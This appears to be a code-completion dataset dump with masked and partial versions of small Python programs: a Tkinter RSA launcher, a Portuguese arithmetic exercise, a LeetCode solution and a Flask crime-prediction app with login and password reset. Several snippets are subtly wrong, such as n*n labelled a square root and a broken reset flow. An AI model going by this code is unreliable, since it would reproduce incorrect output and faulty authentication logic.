from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
fileDir = os.path.dirname(os.path.realpath('__file__'))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
fileDir = os.path.dirname(os.path.realpath('__file__'))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
#print var
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
filename = askopenfilename() # show an "Open" dialog box and return the path to the selected file
return filename
def hash_sha512(message):
# SHA512 HASHING OF THE INPUT FILE
h = SHA512.new()
h.update(str(message))
# digest() Return the binary (non-printable) digest of the message that has been hashed so far.
# hexdigest() Return the printable digest of the message that has been hashed so far.
signature = h.hexdigest()
return signature
def main():
decision = ask_user("DECIDE", "RSA: type 1 to add file or type 2 to verify")
if decision == str(1):
execfile("RSAencr.py")
elif decision == str(2):
execfile("RSAdecr.py")
else:
exit(4)
main() | [
3,
9,
10,
11,
12
] |
1,661 | c0ad3d642f28cb11a8225d4d011dbb241bd88432 | <mask token>
| <mask token>
print(' O dobro de {} é {}'.format(n, n * 2))
print(' O triplo de {} é {}'.format(n, n * 3))
print(' A Raiz quadrada de {} é {}'.format(n, n * n))
| n = int(input('Digite um número inteiro: '))
print(' O dobro de {} é {}'.format(n, n * 2))
print(' O triplo de {} é {}'.format(n, n * 3))
print(' A Raiz quadrada de {} é {}'.format(n, n * n))
| null | null | [
0,
1,
2
] |
1,662 | d39cc2dbbc83869e559f8355ceba5cf420adea5e | class Solution:
<mask token>
<mask token>
| class Solution:
def isUgly(self, num):
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
<mask token>
| class Solution:
def isUgly(self, num):
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
<mask token>
print(a.isUgly(14))
print(a.isUgly(8))
print(a.isUgly(6))
print(a.isUgly(0))
| class Solution:
def isUgly(self, num):
if num == 0:
return False
for n in [2, 3, 5]:
while num % n == 0:
num = num / n
return num == 1
a = Solution()
print(a.isUgly(14))
print(a.isUgly(8))
print(a.isUgly(6))
print(a.isUgly(0))
| null | [
1,
2,
3,
4
] |
1,663 | f6a3693fe81e629d987067265bf4e410bf260bcf | <mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return user.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
'There is no accouunt with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
flash('Account Created For {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return user.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
'There is no accouunt with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
flash('Account Created For {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return user.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
'There is no accouunt with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
<mask token>
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
flash('Account Created For {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
<mask token>
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('login'))
return render_template('reset_token.html', title='Rest Password', form=form
)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
if ENV == 'dev':
cfg = get_config('config.yml')
connection = cfg['connection'][ENV]
app.config['SECRET_KEY'] = connection['secret_key']
app.debug = True
app.config[connection['username']] = connection['password']
app.config['TESTING'] = False
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = True
app.config['MAIL__USE_SSL'] = False
app.config['MAIL_USERNAME'] = connection['mail_user']
app.config['MAIL_PASSWORD'] = connection['mail_pass']
app.config['MAIL_DEFAULT_SENDER'] = '[email protected]'
app.config['MAIL_MAX_EMAILS'] = None
app.config['MAIL_ASCII_ATTACHMENTS'] = False
else:
app.debug = False
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
app.config['MAIL_SERVER'] = os.environ['MAIL_SERVER']
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
app.config['MAIL__USE_SSL'] = False
app.config['MAIL_USERNAME'] = os.environ['MAIL_USERNAME']
app.config['MAIL_PASSWORD'] = os.environ['MAIL_PASSWORD']
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
<mask token>
Bootstrap(app)
<mask token>
login_manager.init_app(app)
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return user.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
'There is no accouunt with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
@app.route('/error/')
def error():
return render_template('error.html')
@app.route('/login_error/')
def login_error():
return render_template('login_error.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
flash('Account Created For {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
@app.route('/signup/', methods=['GET', 'POST'])
def signup():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
new_user = User(username=form.username.data, email=form.email.data,
password=hashed_password)
db.session.add(new_user)
db.session.commit()
return redirect(url_for('login'))
else:
return render_template('signup.html', form=form, message=
'Username / Email Already Exists')
return render_template('signup.html', form=form)
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
@app.route('/email_sent/', methods=['GET', 'POST'])
def email_sent():
return render_template('email_sent.html')
@app.route('/account/', methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated', 'success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
return render_template('account.html', title='Account', form=form)
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
@app.route('/reset_password/', methods=['GET', 'POST'])
def reset_request():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RequestResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
flask(
'An email has been sent with instructions to resset your password',
'info')
return redirect(url_for('login'))
return render_template('reset_request.html', title='Rest Password',
form=form)
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('login'))
return render_template('reset_token.html', title='Rest Password', form=form
)
@app.route('/predict_model', methods=['GET', 'POST'])
def predict_model():
int_features = [int(x) for x in request.form.values()]
final_features = [np.array(int_features)]
prediction = model.predict(final_features)
output = round(prediction[0], 2)
map_dict = {(1): 'DT Toronto', (3): 'North York', (4): 'Scarborough', (
6): 'Etobicoke'}
output = map_dict[output]
return render_template('model_page.html', prediction_text=
'The Crime Occurred in : {}'.format(output))
if __name__ == '__main__':
if ENV == 'prod':
app.run()
else:
app.run(debug=True)
| import numpy as np
import yaml
import pickle
import os
from flask import Flask, request, jsonify, render_template, redirect, url_for, flash
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import ValidationError, DataRequired, EqualTo
from wtforms.validators import InputRequired, Email, Length
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
app = Flask(__name__)
model = pickle.load(open('model_GB.pkl', 'rb'))
ENV = 'prod'
def get_config(fname):
'''
Creates connection to yaml file which holds the DB user and pass
'''
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
if ENV == 'dev':
cfg = get_config('config.yml')
connection = cfg['connection'][ENV]
app.config['SECRET_KEY'] = connection['secret_key']
app.debug = True
app.config[connection['username']] = connection['password']
app.config['TESTING'] = False
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = True
app.config['MAIL__USE_SSL'] = False
app.config['MAIL_USERNAME'] = connection['mail_user']
app.config['MAIL_PASSWORD'] = connection['mail_pass']
app.config['MAIL_DEFAULT_SENDER'] = '[email protected]'
app.config['MAIL_MAX_EMAILS'] = None
app.config['MAIL_ASCII_ATTACHMENTS'] = False
else:
app.debug = False
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
app.config['MAIL_SERVER'] = os.environ['MAIL_SERVER']
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
app.config['MAIL__USE_SSL'] = False
app.config['MAIL_USERNAME'] = os.environ['MAIL_USERNAME']
app.config['MAIL_PASSWORD'] = os.environ['MAIL_PASSWORD']
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
mail = Mail(app)
Bootstrap(app)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds = 1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id' : self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return user.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
password = PasswordField('Password', validators = [InputRequired(), Length(min = 8, max = 80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
password = PasswordField('Password', validators = [InputRequired(), Length(min = 8, max = 80)])
def validate_username(self, username):
'''
Raises a validation error if a user tries to register using an existing username
'''
user = User.query.filter_by(username = username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
'''
Raises a validation error if a user tries to register using an existing email
'''
user = User.query.filter_by(email = email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
submit = SubmitField('Update')
def validate_username(self, username):
'''
Raises a validation error if a user tries to register using an existing username
'''
if username.data != current_user.username:
user = User.query.filter_by(username = username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
'''
Raises a validation error if a user tries to register using an existing email
'''
if email.data != current_user.email:
user = User.query.filter_by(email = email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
'''
Raises a validation error if a user tries to register using an existing email
'''
if email.data != current_user.email:
user = User.query.filter_by(email = email.data).first()
if user is None:
raise ValidationError('There is no accouunt with that email. You must register first.')
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators = [DataRequired()])
confirm_password = PasswordField('Confirm Password', validators = [DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/',methods=['GET', 'POST'])
def home():
return render_template('index.html')
@app.route('/error/')
def error():
return render_template('error.html')
@app.route('/login_error/')
def login_error():
return render_template('login_error.html')
@app.route('/login/',methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username = form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember = form.remember.data)
flash('Account Created For {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
@app.route('/signup/', methods = ['GET','POST'])
def signup():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method = 'sha256') # sha256 will generate a hash which is 80 chars long
new_user = User(username = form.username.data, email = form.email.data, password = hashed_password)
db.session.add(new_user)
db.session.commit()
# send congrat email for registering
# msg = Message(subject = 'Welcome {}'.format(form.username.data), sender = app.config.get("MAIL_USERNAME"), recipients = [str(form.email.data)], body = 'Congratulations you have signed up and your account has been created!')
# mail.send(msg)
return redirect(url_for('login'))
else:
return render_template('signup.html', form = form, message= 'Username / Email Already Exists')
# return '<h1>' + form.email.data + ' ' + form.username.data + ' ' + form.password.data + '<h1>'
return render_template('signup.html', form = form)
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/',methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
@app.route('/email_sent/',methods=['GET', 'POST'])
def email_sent():
return render_template('email_sent.html')
@app.route('/account/',methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated', 'success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
return render_template('account.html', title = 'Account', form = form)
@app.route('/model_page/', methods = ['GET','POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject = 'Password Reset Request',
sender = '[email protected]',
recipients=[user.email])
msg.body = f''' To reset your password, visit the following link :
{url_for('reset_token', token = token, _external = True)}
If you did not make this request then simply ignore this email and no changes will be made.
'''
mail.send(msg)
@app.route('/reset_password/',methods=['GET', 'POST'])
def reset_request():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RequestResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email = form.email.data).first()
flask('An email has been sent with instructions to resset your password', 'info')
return redirect(url_for('login'))
